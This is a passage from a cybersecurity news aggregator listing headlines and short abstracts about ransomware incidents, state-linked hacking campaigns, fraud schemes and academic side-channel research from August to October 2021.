Researchers highlight two separate campaigns dropping REvil and SolarMarker backdoors leveraging the SEO poisoning method to spread payloads in the systems of targeted victims.Cyware Alerts - Hacker News
October 30, 2021
Ransomware Attack Hits PNG Finance Ministry Full Text
Abstract
Ransomware infiltrated and compromised a core server at the department of finance last week, hampering the government's access to foreign aid, its ability to pay cheques, and carry out other basic functions in the midst of a spiraling Covid-19 surge.Security Week
October 29, 2021
Papua New Guinea ‘s finance ministry was hit by a ransomware Full Text
Abstract
A ransomware attack hit Papua New Guinea 's finance ministry and disrupted government payments and operations. Government officials confirmed that Papua New Guinea's finance ministry was hit by a ransomware attack that disrupted government payments...Security Affairs
October 28, 2021
UltimaSMS Victimizes Millions in Fraud Campaign Full Text
Abstract
A fraud campaign, dubbed UltimaSMS, is signing up users to premium SMS subscription services without their consent and knowledge. Promoted mostly via Instagram and TikTok, these Android apps have over 10.5 million downloads and involve at least 151 malicious apps. Stay cautious!Cyware Alerts - Hacker News
October 27, 2021
NRA hit by Russian-linked ransomware attack: reports Full Text
Abstract
The National Rifle Association (NRA) has been hit by a ransomware attack, becoming the latest victim of a massive spike in these attacks this year, according to multiple reports Wednesday.The Hill
October 27, 2021
Abuse of Discord CDN Witnesses Significant Rise Full Text
Abstract
A recent investigation conducted by RiskIQ revealed that threat actors abused the Discord channel to deliver a total of 27 unique malware families. This included backdoors, password stealers, spyware, and trojans.Cyware Alerts - Hacker News
October 27, 2021
Latest Report Uncovers Supply Chain Attacks by North Korean Hackers Full Text
Abstract
Lazarus Group, the advanced persistent threat (APT) group attributed to the North Korean government, has been observed waging two separate supply chain attack campaigns as a means to gain a foothold into corporate networks and target a wide range of downstream entities. The latest intelligence-gathering operation involved the use of MATA malware framework as well as backdoors dubbed BLINDINGCAN and COPPERHEDGE to attack the defense industry, an IT asset monitoring solution vendor based in Latvia, and a think tank located in South Korea, according to a new Q3 2021 APT Trends report published by Kaspersky. In one instance, the supply-chain attack originated from an infection chain that stemmed from legitimate South Korean security software running a malicious payload, leading to the deployment of the BLINDINGCAN and COPPERHEDGE malware on the think tank's network in June 2021. The other attack on the Latvian company in May is an "atypical victim" for Lazarus, theThe Hacker News
October 26, 2021
Ranzy Locker ransomware hit tens of US companies in 2021 Full Text
Abstract
The FBI published a flash alert to warn of the activity of the Ranzy Locker ransomware that had already compromised tens of US companies. The FBI published a flash alert to warn of Ranzy Locker ransomware operations that had already compromised at least...Security Affairs
October 26, 2021
UltimaSMS subscription fraud campaign targeted millions of Android users Full Text
Abstract
UltimaSMS, a massive fraud campaign is using Android apps with million of downloads to subscribe victims to premium subscription services. Researchers from Avast have uncovered a widespread premium SMS scam on the Google Play Store, tracked as UltimaSMS,...Security Affairs
October 25, 2021
New hacking efforts show Russia undeterred by US actions Full Text
Abstract
A year after Russian government hackers compromised almost a dozen U.S. federal agencies, renewed efforts by the same group to target the global IT supply chain are painting a picture of a defiant Russia undeterred by U.S. efforts to clamp down on malicious cyber activity.The Hill
October 25, 2021
Millions of Android users targeted in subscription fraud campaign Full Text
Abstract
A new SMS scam campaign relying upon 151 apps has been uncovered, with many of these apps managing to find their way into the Play Store where they amassed 10.5 million downloads.BleepingComputer
October 24, 2021
NYT Journalist Repeatedly Hacked with Pegasus after Reporting on Saudi Arabia Full Text
Abstract
The iPhone of New York Times journalist Ben Hubbard was repeatedly hacked with NSO Group's Pegasus spyware tool over a three-year period stretching between June 2018 to June 2021, resulting in infections twice in July 2020 and June 2021. The University of Toronto's Citizen Lab, which publicized the findings on Sunday, said the "targeting took place while he was reporting on Saudi Arabia, and writing a book about Saudi Crown Prince Mohammed bin Salman." The research institute did not attribute the infiltrations to a specific government. In a statement shared with Hubbard, the Israeli company denied its involvement in the hacks and dismissed the findings as "speculation," while noting that the journalist was not "a target of Pegasus by any of NSO's customers." To date, NSO Group is believed to have leveraged at least three different iOS exploits — namely an iMessage zero-click exploit in December 2019, a KISMET exploit targeting iOS 13The Hacker News
October 24, 2021
SmashEx Attack Reaches Most Secure Areas of Intel CPUs to Steal Data Full Text
Abstract
Academics from universities developed a new attack technique, dubbed SmashEx, that runs into Intel SGX and can allow adversaries to steal confidential data from Intel CPUs. The new vulnerability tracked by Intel as CVE-2021-0186 allows attackers to inject an asynchronous exception during the code ... Read MoreCyware Alerts - Hacker News
October 24, 2021
Phishing Campaign Targeting High-profile YouTubers Unmasked Full Text
Abstract
High-profile YouTube creators have been targeted with cookie-theft malware in phishing attacks, wherein hackers offered them fake collaboration opportunities. Google has identified around 15,000 actor accounts specifically created for this campaign. YouTube users are recommended to be aware of th ... Read MoreCyware Alerts - Hacker News
October 22, 2021
‘Lone Wolf’ Hacker Group Targeting Afghanistan and India with Commodity RATs Full Text
Abstract
A new malware campaign targeting Afghanistan and India is exploiting a now-patched, 20-year-old flaw affecting Microsoft Office to deploy an array of commodity remote access trojans (RATs) that allow the adversary to gain complete control over the compromised endpoints. Cisco Talos attributed the cyber campaign to a "lone wolf" threat actor operating a Lahore-based fake IT company called Bunse Technologies as a front to carry out the malicious activities, while also having a history of sharing content that's in favor of Pakistan and Taliban dating all the way back to 2016. The attacks work by taking advantage of political and government-themed lure domains that host the malware payloads, with the infection chains leveraging weaponized RTF documents and PowerShell scripts that distribute malware to victims. Specifically, the laced RTF files were found exploiting CVE-2017-11882 to execute a PowerShell command that's responsible for deploying additional malware toThe Hacker News
October 22, 2021
Swiss exhibitions organizer MCH Group hit by cyberattack Full Text
Abstract
Swiss events organizer and marketing company MCH Group was hit by a malware attack on Wednesday (October 20). The firm says it is working to get systems up and running again.The Daily Swig
October 21, 2021
Gigabyte Allegedly Hit by AvosLocker Ransomware Full Text
Abstract
If AvosLocker stole Gigabyte’s master keys, threat actors could force hardware to download fake drivers or BIOS updates in a supply-chain attack a la SolarWinds.Threatpost
October 21, 2021
Massive campaign uses YouTube to push password-stealing malware Full Text
Abstract
Widespread malware campaigns are creating YouTube videos to distribute password-stealing trojans to unsuspecting viewers.BleepingComputer
October 21, 2021
Evil Corp demands $40 million in new Macaw ransomware attacks Full Text
Abstract
Evil Corp has launched a new ransomware called Macaw Locker to evade US sanctions that prevent victims from making ransom payments.BleepingComputer
October 20, 2021
Google: YouTubers’ accounts hijacked with cookie-stealing malware Full Text
Abstract
Google says YouTube creators have been targeted with password-stealing malware in phishing attacks coordinated by financially motivated threat actors since at least late 2019.BleepingComputer
October 20, 2021
New Gummy Browsers attack lets hackers spoof tracking profiles Full Text
Abstract
University researchers in the US have developed a new fingerprint capturing and browser spoofing attack called Gummy Browsers. They warn how easy the attack is to carry out and the severe implications it can have.BleepingComputer
October 20, 2021
Google says Russian-speaking hackers hijacked YouTube channels for cryptocurrency scam Full Text
Abstract
Google on Wednesday reported it has tracked and disrupted an email phishing campaign tied to Russian-speaking hackers that has targeted YouTube users since 2019 as part of a cryptocurrency scam effort.The Hill
October 20, 2021
New Stealth Phishing Campaign Targets Financial Organizations Full Text
Abstract
Morphisec Labs unearthed a new MirrorBlast campaign aimed at financial services across Canada, the U.S., Europe, Hong Kong, and others. The campaign has an uncanny resemblance to the Russia-based TA505 group. Organizations must protect themselves with adequate protection solutions, such as anti-phi ... Read MoreCyware Alerts - Hacker News
October 19, 2021
Acer hacked twice in a week by the same threat actor Full Text
Abstract
Acer has suffered a second cyberattack in just a week by the same hacking group that says other regions are vulnerable.BleepingComputer
October 18, 2021
Sinclair Confirms Ransomware Attack That Disrupted TV Stations Full Text
Abstract
A major cyberattack resulted in data being stolen, too, but Sinclair’s not sure which information is now in the hands of the crooks.Threatpost
October 18, 2021
Sinclair Broadcast Group hit by ransomware attack Full Text
Abstract
Sinclair Broadcast Group, one of the nation’s largest television station operators, announced Monday that it had been hit by a ransomware attack over the weekend that resulted in data theft and network disruption.The Hill
October 18, 2021
Suspected Chinese hackers behind attacks on ten Israeli hospitals Full Text
Abstract
A joint announcement from the Ministry of Health and the National Cyber Directorate in Israel describes a spike in ransomware attacks over the weekend that targeted the systems of nine health institutes in the country.BleepingComputer
October 15, 2021
Twitch downplays this month’s hack, says it had minimal impact Full Text
Abstract
In an update regarding this month's security incident, Twitch downplayed the breach saying that it had minimal impact and it only affected a small number of users.BleepingComputer
October 15, 2021
Boffins devise a new side-channel attack affecting all AMD CPUs Full Text
Abstract
A group of researchers from the Graz University of Technology and CISPA Helmholtz Center for Information Security devised a new side-channel attack that affects AMD CPUs. Researchers Moritz Lipp and Daniel Gruss of the Graz University of Technology...Security Affairs
October 15, 2021
Verizon-owned Visible Acknowledges Hack, Confirms Account Manipulations Full Text
Abstract
The company came forward and confirmed the attack in a Twitter thread, writing that it was "aware of an issue in which some member accounts were accessed and/or charged without their authorization."ZDNet
October 15, 2021
Three more ransomware attacks hit Water and Wastewater systems in 2021 Full Text
Abstract
A joint cybersecurity advisory published by US agencies revealed that three ransomware attacks on wastewater systems this year. A joint cybersecurity advisory published today by the FBI, NSA, CISA, and the EPA revealed three more attacks launched...Security Affairs
October 14, 2021
Israeli Hospital Forced to Cancel Non-Urgent Procedures Due to Ransomware Attack Full Text
Abstract
Israel’s National Cyber Directorate (INCD) is urging organizations across the country to bolster their cyber defenses following a disruptive ransomware attack against a hospital in Israel’s northwest.The Daily Swig
October 14, 2021
For the first time, an Israeli hospital was hit by a major ransomware attack Full Text
Abstract
The Hillel Yaffe Medical Center in Hadera, Israel, was hit by a ransomware attack that was defined by Israel's National Cyber Directorate as a "major" attack. The Hillel Yaffe Medical Center in Hadera, Israel was hit by a ransomware attack that impacted...Security Affairs
October 14, 2021
New Yanluowang ransomware used in highly targeted attacks on large orgs Full Text
Abstract
Researchers spotted a new strain of ransomware, dubbed Yanluowang, that was used in highly targeted attacks against enterprises. Researchers from Symantec Threat Hunter Team discovered a ransomware family, tracked as Yanluowang ransomware that was used...Security Affairs
October 14, 2021
New Yanluowang ransomware used in targeted enterprise attacks Full Text
Abstract
A new and still under development ransomware strain is being used in highly targeted attacks against enterprise entities as Broadcom's Symantec Threat Hunter Team discovered.BleepingComputer
October 13, 2021
Verizon digital carrier Visible customer accounts were hacked Full Text
Abstract
Visible, a US digital wireless carrier owned by Verizon, admitted that some customer accounts were hacked after dealing with technical problems in the past couple of days.BleepingComputer
October 12, 2021
Olympus US systems hit by cyberattack over the weekend Full Text
Abstract
Olympus, a leading medical technology company, was forced to take down IT systems in the Americas (U.S., Canada and Latin America) following a cyberattack that hit its network Sunday, on October 10, 2021.BleepingComputer
October 11, 2021
Pacific City Bank discloses ransomware attack claimed by AvosLocker Full Text
Abstract
Pacific City Bank (PCB), one of the largest Korean-American community banking service providers in America, has disclosed a ransomware incident that took place last month.BleepingComputer
October 10, 2021
Previously undetected FontOnLake Linux malware used in targeted attacks Full Text
Abstract
ESET researchers spotted a previously unknown, modular Linux malware, dubbed FontOnLake, that has been employed in targeted attacks. ESET researchers spotted a previously unknown, modular Linux malware, dubbed FontOnLake, that was employed in targeted...Security Affairs
October 9, 2021
Attackers Encrypt VMware ESXi Server With Python Ransomware Full Text
Abstract
According to Sophos, the script contains multiple hardcoded encryption keys, and a routine for generating even more keys, which led the researchers to the conclusion that the ransomware creates a unique key at each run.Security Week
October 8, 2021
Hydra Spreads Tentacles to Target European Banks Full Text
Abstract
MalwareHunterTeam reported a new campaign spreading Hydra banking trojan across European banking platforms, specifically customers of Germany’s second-largest financial institution. The malware uses different encryption methods to avoid detection, along with the use of Tor for communication. ... Read MoreCyware Alerts - Hacker News
October 08, 2021
Engineering giant Weir Group hit by ransomware attack Full Text
Abstract
Scottish multinational engineering firm Weir Group has disclosed by what it called an "attempted ransomware attack" that led to "significant temporary disruption" in the second half of September.BleepingComputer
October 07, 2021
Google warns 14,000 Gmail users targeted by Russian hackers Full Text
Abstract
Google has warned about 14,000 of its users about being targeted in a state-sponsored phishing campaign from APT28, a threat group that has been linked to Russia.BleepingComputer
October 07, 2021
FIN12 hits healthcare with quick and focused ransomware attacks Full Text
Abstract
While most ransomware actors spend time on the victim network looking for important data to steal, one group favors quick malware deployment against sensitive, high-value targets.BleepingComputer
October 06, 2021
Twitch hack allegedly includes source code and earnings for streamers Full Text
Abstract
Online video game streaming service Twitch suffered a hack on Wednesday that leaked sources codes, user payouts and earnings for streamers, The Wall Street Journal reported.The Hill
October 6, 2021
LANtenna attack allows exfiltrating data from Air-Gapped systems via Ethernet cables Full Text
Abstract
Boffins devised a new technique, dubbed LANtenna, to exfiltrate data from systems in air-gapped networks using Ethernet cables as a "transmitting antenna." Security researchers from the Cyber Security Research Center in the Ben Gurion University...Security Affairs
October 06, 2021
Fired IT admin revenge-hacks school by wiping data, changing passwords Full Text
Abstract
A 29-year old wiped data on systems of a secondary school in the U.K. and changed the passwords at an IT company, in retaliatory cyber attacks for being fired.BleepingComputer
October 4, 2021
LockBit 2.0 ransomware hit Israeli defense firm E.M.I.T. Aviation Consulting Full Text
Abstract
Israeli Aerospace & Defense firm E.M.I.T. Aviation Consulting Ltd. was hit by LockBit 2.0 ransomware, operators will leak files on 07 Oct, 2021. LockBit 2.0 ransomware operators hit the Israeli aerospace and defense firm E.M.I.T. Aviation Consulting...Security Affairs
October 1, 2021
Baby died at Alabama Springhill Medical Center due to cyber attack Full Text
Abstract
A baby allegedly received inadequate childbirth health care, and later died, at an Alabama Springhill Medical Center due to a ransomware attack. An Alabama woman named Teiranni Kidd has filed suit after the death of her baby, she claims that the Springhill...Security Affairs
October 01, 2021
MoneyLion locks customer accounts after credential stuffing attacks Full Text
Abstract
The banking and investing platform MoneyLion had to lock customer accounts that were breached in credential stuffing attacks over the summer, in June and July.BleepingComputer
October 1, 2021
Hydra Android Trojan Campaign Targets Customers of Commerzbank and other European Banks Full Text
Abstract
Threat actors set up a page posing as the official CommerzBank page and registered multiple domains on the same IP address. Crooks used the fake website to spread fake CommerzBank apps.Security Affairs
September 30, 2021
JVCKenwood hit by Conti ransomware claiming theft of 1.5TB data Full Text
Abstract
JVCKenwood has suffered a Conti ransomware attack where the threat actors claim to have stolen 1.7 TB of data and are demanding a $7 million ransom.BleepingComputer
September 30, 2021
Proxy Phantom: Fraud rings flood online merchants with credential stuffing attacks Full Text
Abstract
Fraud prevention company Sift said the ring, dubbed Proxy Phantom, is using over 1.5 million sets of stolen account credentials in automated credential stuffing attacks against online merchants.ZDNet
September 27, 2021
Escalating Conti Ransomware Attacks Major Cause of Concern Full Text
Abstract
The CISA, the FBI, and the NSA published a joint alert, warning organizations of increased Conti activity. It states that the ransomware has been, so far, used in more than 400 attacks in the U.S. and other countries.Cyware Alerts - Hacker News
September 26, 2021
Port of Houston was hit by an alleged state-sponsored attack Full Text
Abstract
Last month, the Port of Houston, one of the major US ports, was hit by a cyber attack allegedly orchestrated by a nation-state actor. One of the major US ports, the Port of Houston, revealed that it was hit by a cyber attack in August that had no impact...Security Affairs
September 26, 2021
JSC GREC Makeyev and other Russian entities under attack Full Text
Abstract
A cyberespionage campaign hit multiple Russian organizations, including JSC GREC Makeyev, a major defense contractor, exploiting a recently disclosed zero-day. Security researchers from Malwarebytes uncovered multiple attacks targeting many Russian...Security Affairs
September 25, 2021
GSS, one of the major European call center providers, suffered a ransomware attack Full Text
Abstract
The customer care and call center provider GSS has suffered a ransomware attack that crippled its systems and impacted its Spanish-speaking customers. GSS customer care and call center provider has suffered a ransomware attack that crippled its system...Security Affairs
September 25, 2021
Port of Houston Target of Suspected Nation-State Hack Full Text
Abstract
The Port of Houston, a critical piece of infrastructure along the Gulf Coast, issued a statement saying it had successfully defended against an attempted hack in August and “no operational data or systems were impacted.”Security Week
September 24, 2021
United Health Centers ransomware attack claimed by Vice Society Full Text
Abstract
California-based United Health Centers suffered a ransomware attack that reportedly disrupted all of their locations and resulted in patient data theft.BleepingComputer
September 24, 2021
Targeted Attacks Launched Against Government Personnel in India Using Commercial RATs Full Text
Abstract
The lures used in this campaign are predominantly themed around operational documents and guides such as those pertaining to the "Kavach" (hindi for "armor") 2FA application operated by India's NIC.Cisco Talos
September 23, 2021
Crystal Valley hit by ransomware attack, it is the second farming cooperative shut down in a week Full Text
Abstract
Minnesota-based farming supply cooperative Crystal Valley was hit by a ransomware attack, it is the second attack against the agriculture business in a few days. Minnesota farming supply cooperative Crystal Valley has suffered a ransomware attack,...Security Affairs
September 22, 2021
Crystal Valley Farm Coop Hit with Ransomware Full Text
Abstract
It’s the second agricultural business to be seized this week and portends a bitter harvest with yet another nasty jab at critical infrastructure.Threatpost
September 22, 2021
Ransomware Gangs Attack Missouri Delta Medical Center and Barlow Respiratory Hospital Full Text
Abstract
Barlow Respiratory Hospital said while the attack affected several IT systems, the hospital was able to continue to operate under its emergency procedures and patient care was not interrupted.HIPAA Journal
September 21, 2021
Israeli communications company hit by major cyberattack Full Text
Abstract
The company sent SMS messages to its clients on Sunday, saying that the perpetrators of the attack were "hackers from abroad." However, Voicenter claimed that the attack did not affect its work.Middleeast Monitor
September 21, 2021
Supply Chain Attacks via Open-Source Repositories Spike Full Text
Abstract
A report from Sonatype revealed that supply chain attacks on open-source public repositories have increased up to 650% year-over-year. The security firm has mentioned that the significant increase in supply-chain attacks has been mainly caused by the exploitation of flaws in popular open-source ec ... Read MoreCyware Alerts - Hacker News
September 21, 2021
Marketron marketing services hit by Blackmatter ransomware Full Text
Abstract
BlackMatter ransomware gang over the weekend hit Marketron, a business software solutions provider that serves more than 6,000 customers in the media industry.BleepingComputer
September 21, 2021
Iowa Farm Services Provider Targeted by BlackMatter Ransomware, Faces $5.9 Million Ransom Demand Full Text
Abstract
New Cooperative -- an Iowa-based farm service provider -- has been hit with a ransomware attack, continuing a streak of incidents affecting agricultural companies this year.ZDNet
September 20, 2021
Major agriculture group New Cooperative hit by ransomware attack Full Text
Abstract
Agriculture group New Cooperative group was hit by a ransomware attack over the weekend, potentially endangering operations of a company key to the agricultural supply chain.The Hill
September 20, 2021
US farmer cooperative hit by $5.9M BlackMatter ransomware attack Full Text
Abstract
U.S. farmers cooperative NEW Cooperative has suffered a BlackMatter ransomware attack demanding $5.9 million not to leak stolen data and provide a decryptor.BleepingComputer
September 20, 2021
Large phishing campaign targets EMEA and APAC governments Full Text
Abstract
Security researchers uncovered a large phishing campaign targeting multiple government departments in APAC and EMEA countries. Researchers from cybersecurity firm Cyjax uncovered a large phishing campaign targeting multiple government departments...Security Affairs
September 20, 2021
SSID Stripping Attacks Could Lead You to Fake Access Points Full Text
Abstract
SSID Stripping is a method that malicious attackers could use to fool users into connecting to fake Wireless Access Points (WAPs). It affects devices running macOS, iOS, Ubuntu, Windows, and Android.Cyware Alerts - Hacker News
September 20, 2021
A New Wave of Malware Attack Targeting Organizations in South America Full Text
Abstract
A spam campaign delivering spear-phishing emails aimed at South American organizations has retooled its techniques to include a wide range of commodity remote access trojans (RATs) and geolocation filtering to avoid detection, according to new research. Cybersecurity firm Trend Micro attributed the attacks to an advanced persistent threat (APT) tracked as APT-C-36 (aka Blind Eagle), a suspected South America espionage group that has been active since at least 2018 and previously known for setting its sights on Colombian government institutions and corporations spanning financial, petroleum, and manufacturing sectors. Primarily spread via fraudulent emails by masquerading as Colombian government agencies, such as the National Directorate of Taxes and Customs (DIAN), the infection chain commences when the message recipients open a decoy PDF or Word document that claims to be a seizure order tied to their bank accounts and click on a link that's been generated from a URL shortThe Hacker News
September 17, 2021
Malware Attack on Aviation Sector Uncovered After Going Unnoticed for 2 Years Full Text
Abstract
A targeted phishing campaign aimed at the aviation industry for two years may be spearheaded by a threat actor operating out of Nigeria, highlighting how attackers can carry out small-scale cyber offensives for extended periods of time while staying under the radar. Cisco Talos dubbed the malware attacks "Operation Layover," building on previous research from the Microsoft Security Intelligence team in May 2021 that delved into a "dynamic campaign targeting the aerospace and travel sectors with spear-phishing emails that distribute an actively developed loader, which then delivers RevengeRAT or AsyncRAT." "The actor […] doesn't seem to be technically sophisticated, using off-the-shelf malware since the beginning of its activities without developing its own malware," researchers Tiago Pereira and Vitor Ventura said . "The actor also buys the crypters that allow the usage of such malware without being detected, throughout the years it has useThe Hacker News
September 17, 2021
German Election body hit by a cyber attack Full Text
Abstract
A spokesman for the authority running Germany's September 26 general election confirmed that hackers briefly disrupted its website last month. Threat actors last month hit the website of the authority running Germany's September 26 general election,...Security Affairs
September 17, 2021
City of Yonkers attacked by ransomware but refuses to pay ransom Full Text
Abstract
Government employees at the City of Yonkers were denied access to their computers last week, after cybercriminals launched a ransomware attack. The city said that it refused to pay the ransom.IT Governance
September 15, 2021
Anonymous hacked the controversial, far-right web host Epik Full Text
Abstract
Anonymous claims to have hacked the controversial web hosting provider Epik, known for allowing far-right, neo-Nazi, and other extremist content. Anonymous hacktivist collective claims has claimed to have hacked the controversial web hosting provided...Security Affairs
September 14, 2021
New Zloader attacks disable Windows Defender to evade detection Full Text
Abstract
An ongoing Zloader campaign uses a new infection chain to disable Microsoft Defender Antivirus (formerly Windows Defender) on victims' computers to evade detection.BleepingComputer
September 14, 2021
BlackMatter Ransomware Hits Japanese Tech Giant Olympus Full Text
Abstract
The incident that occurred Sept. 8 and affected its EMEA IT systems seems to signal a return to business as usual for ransomware groups.Threatpost
September 14, 2021
Researchers Unearth Logic Bomb Attack in Python Package Index (PyPI) Full Text
Abstract
The researchers found six malicious payloads, all uploaded by a single user. The attacker designed them to run during a package’s installation. People have collectively downloaded these payloads around 5,000 times.Security Intelligence
September 13, 2021
New Spook.Js attack allows to bypass Google Chrome Site Isolation protections Full Text
Abstract
Spook.js is a new side-channel attack on modern processors that can allow bypassing Site Isolation protections implemented in Google Chrome. Boffins devised a transient side-channel attack on modern processors, "Spook.js," that can be abused by threat...Security Affairs
September 13, 2021
Hacker-made Linux Cobalt Strike beacon used in ongoing attacks Full Text
Abstract
An unofficial Cobalt Strike Beacon Linux version made by unknown threat actors from scratch has been spotted by security researchers while actively used in attacks targeting organizations worldwide.BleepingComputer
September 13, 2021
BlackMatter ransomware hits medical technology giant Olympus Full Text
Abstract
Olympus, a leading medical technology company, is investigating a "potential cybersecurity incident" that impacted some of its EMEA (Europe, Middle East, Africa) IT systems last week.BleepingComputer
September 13, 2021
New SpookJS Attack Bypasses Google Chrome’s Site Isolation Protection Full Text
Abstract
A newly discovered side-channel attack demonstrated on modern processors can be weaponized to successfully overcome Site Isolation protections weaved into Google Chrome and Chromium browsers and leak sensitive data in a Spectre-style speculative execution attack. Dubbed " Spook.js " by academics from the University of Michigan, University of Adelaide, Georgia Institute of Technology, and Tel Aviv University, the technique is a JavaScript-based line of attack that specifically aims to get around barriers Google put in place after Spectre and Meltdown vulnerabilities came to light in January 2018, thereby potentially preventing leakage by ensuring that content from different domains is not shared in the same address space. "An attacker-controlled webpage can know which other pages from the same websites a user is currently browsing, retrieve sensitive information from these pages, and even recover login credentials (e.g., username and password) when they are auThe Hacker News
September 13, 2021
Department of Justice and Constitutional Development of South Africa hit by a ransomware attack Full Text
Abstract
A ransomware attack hit the Department of Justice and Constitutional Development of South Africa. Multiple services including email and bail services were impacted by the ransomware attack.Security Affairs
September 13, 2021
Department of Justice and Constitutional Development of South Africa hit by a ransomware attack Full Text
Abstract
The Department of Justice and Constitutional Development of South Africa was hit by a ransomware attack that crippled bail services. A ransomware attack hit the Department of Justice and Constitutional Development of South Africa, multiple services,...Security Affairs
September 13, 2021
LockBit 2.0: Ransomware Attacks Surge After Successful Affiliate Recruitment Full Text
Abstract
After a brief slowdown in activity from the LockBit ransomware gang following increased attention from law enforcement, LockBit is back with a new affiliate program, improved payloads and a change in infrastructure.Security Intelligence
September 11, 2021
REvil ransomware is back in full attack mode and leaking data Full Text
Abstract
The REvil ransomware gang has fully returned and is once again attacking new victims and publishing stolen files on a data leak site.BleepingComputer
September 10, 2021
Experts confirmed that the networks of the United Nations were hacked earlier this year Full Text
Abstract
The United Nations this week confirmed that its computer networks were hit by a cyberattack earlier this year, as first reported by Bloomberg. The United Nations on Thursday confirmed that its computer networks were hit by a cyberattack earlier this...Security Affairs
September 10, 2021
Virginia National Guard confirms cyberattack hit Virginia Defense Force email accounts Full Text
Abstract
Email accounts connected to the Virginia Defense Force and the Virginia Department of Military Affairs were impacted by a cyberattack in July, according to a spokesperson from the Virginia National Guard.ZDNet
September 9, 2021
BladeHawk Attackers Target Kurds with Android Apps Full Text
Abstract
Pro-Kurd Facebook profiles deliver ‘888 RAT’ and ‘SpyNote’ trojans, masked as legitimate apps, to perform mobile espionage.Threatpost
September 9, 2021
Jenkins discloses attack on its Atlassian Confluence service Full Text
Abstract
Attackers abused an Open Graph Navigation Library (OGNL) injection flaw – the same vulnerability type involved in the notorious 2017 Equifax hack – capable of leading to remote code execution (RCE) in Confluence Server and Data Center instances.IT Security Guru
September 08, 2021
Experts Uncover Mobile Spyware Attacks Targeting Kurdish Ethnic Group Full Text
Abstract
Cybersecurity researchers on Tuesday released new findings that reveal a year-long mobile espionage campaign against the Kurdish ethnic group to deploy two Android backdoors that masquerade as legitimate apps. Active since at least March 2020, the attacks leveraged as many as six dedicated Facebook profiles that claimed to offer tech and pro-Kurd content — two aimed at Android users while the other four appeared to provide news for the Kurdish supporters — only to share links to spying apps on public Facebook groups. All the six profiles have since been taken down. "It targeted the Kurdish ethnic group through at least 28 malicious Facebook posts that would lead potential victims to download Android 888 RAT or SpyNote," ESET researcher Lukas Stefanko said . "Most of the malicious Facebook posts led to downloads of the commercial, multi-platform 888 RAT, which has been available on the black market since 2018." The Slovakian cybersecurity firm attributed the atThe Hacker News
September 8, 2021
Researchers Uncover Email Fraud Campaigns Using Social Engineering Tactics to Steal Crypto Assets Full Text
Abstract
Victims are tempted by the promise of a considerable amount of cryptocurrency. Cashing out the full balance requires them to deposit some Bitcoin to the platform, which is the point of the scheme.Proofpoint
September 8, 2021
Bridgeport city government hacked, residents put on notice Full Text
Abstract
Residents of Bridgeport have been notified city government was hacked in late May of this year. A letter to residents said city IT systems were encrypted in a ransomware attack.WAJR
September 7, 2021
Jenkins Hit as Atlassian Confluence Cyberattacks Widen Full Text
Abstract
Patch now: The popular biz-collaboration platform is seeing mass scanning and exploitation just two weeks after a critical RCE bug was disclosed.Threatpost
September 07, 2021
Howard University hit with ransomware attack, cancels classes Full Text
Abstract
Howard University announced the cancellation of classes after being hit with a ransomware attack last week, though it said there was no evidence of personal information being stolen.The Hill
September 7, 2021
A server of the Jenkins project hacked by exploiting a Confluence flaw Full Text
Abstract
The development team behind the Jenkins server disclose a security breach, threat actors deployed a cryptocurrency miner on one of its servers. The development team behind the Jenkins Project disclosed a security breach after threat actors compromised...Security Affairs
September 6, 2021
German foreign ministry: Russia responsible for cyber attacks on German parliament Full Text
Abstract
The German government has revealed that it has reliable information according to which ghost writer activities can be attributed to cyber protagonists of the Russian state or Russia's GRU military intelligence.Reuters
September 5, 2021
Pacific City Bank hit by AVOS Locker Ransomware Full Text
Abstract
Pacific City Bank was hit by AVOS Locker Ransomware operators, the gang claims to have stolen sensitive file from the company and threatens to leak it. Pacific City Bank is an American community bank that focuses on the Korean-American community...Security Affairs
September 4, 2021
Autodesk Says Company Was Targeted by SolarWinds Attackers Full Text
Abstract
Autodesk, a California-based design software and 3D technology firm, has acknowledged that it was one of several tech and security companies targeted by a Russian-linked group that carried out the supply chain attack against SolarWinds.Gov Info Security
September 3, 2021
Attacks against SolarWinds Serv-U SW were possible due to the lack of ASLR mitigation Full Text
Abstract
SolarWinds did not enable anti-exploit mitigation available since 2006 allowing threat actors to target SolarWinds Serv-U FTP software in July attacks. Software vendor SolarWinds did not enable ASLR anti-exploit mitigation that was available since...Security Affairs
September 02, 202
1
What is AS-REP Roasting attack, really? Full Text
Abstract
Microsoft's Active Directory is said to be used by 95% of Fortune 500. As a result, it is a prime target for attackers as they look to gain access to credentials in the organization, as compromised credentials provide one of the easiest ways for hackers to access your data. A key authentication technology that underpins Microsoft Active Directory is Kerberos. Unfortunately, hackers use many different attacks against Active Directory's implementation of the Kerberos authentication protocol. One of those is AS-REP Roasting. So what is AS-REP Roasting, and how can businesses protect themselves? What is Active Directory Kerberos? Kerberos was originally developed by the Massachusetts Institute of Technology (MIT) and centered around using tickets to establish trust. Microsoft's implementation of Kerberos found in Active Directory is based on Kerberos Network Authentication Service (V5) as defined in RFC 4120 . However, Microsoft has added to and enhanced Kerberos with itThe Hacker News
September 2, 2021
Comcast RF Attack Leveraged Remotes for Surveillance Full Text
Abstract
IoT vulnerabilities turned the remote into a listening device, researchers found, which impacted 18 million Xfinity customers.Threatpost
September 02, 2021
Autodesk reveals it was targeted by Russian SolarWinds hackers Full Text
Abstract
Autodesk has confirmed that it was also targeted by the Russian state hackers behind the large-scale SolarWinds Orion supply-chain attack, almost nine months after discovering that one of its servers was backdoored with Sunburst malware.BleepingComputer
September 1, 2021
Feds Warn of Ransomware Attacks Ahead of Labor Day Full Text
Abstract
Threat actors recently have used long holiday weekends — when many staff are taking time off — as a prime opportunity to ambush organizations.Threatpost
August 30, 2021
T-Mobile Hack Involved Exposed Router, Specialized Tools and Brute Force Attacks Full Text
Abstract
Mike Sievert, CEO of T-Mobile, said that while the company’s investigation into the incident was “substantially complete,” he could not share too many technical details due to ongoing criminal probe.Security Week
August 30, 2021
Boston Public Library discloses cyberattack Full Text
Abstract
The Boston Public Library was victim of a cyberattack that crippled its computer network, the library revealed in a statement Friday. The Boston Public Library announced on Friday that it was hit by a cyberattack that compromised its computer network....Security Affairs
August 30, 2021
New variant of Konni RAT used in a campaign that targeted Russia Full Text
Abstract
So far, Konni RAT has managed to evade detection as only 3 security solutions on VirusTotal were able to detect the malware. Researchers from Malwarebytes Labs spotted an ongoing malware campaign that is targeing Russia with the Konni RAT. Security...Security Affairs
August 28, 2021
Microsoft Warns of Widespread Phishing Attacks Using Open Redirects Full Text
Abstract
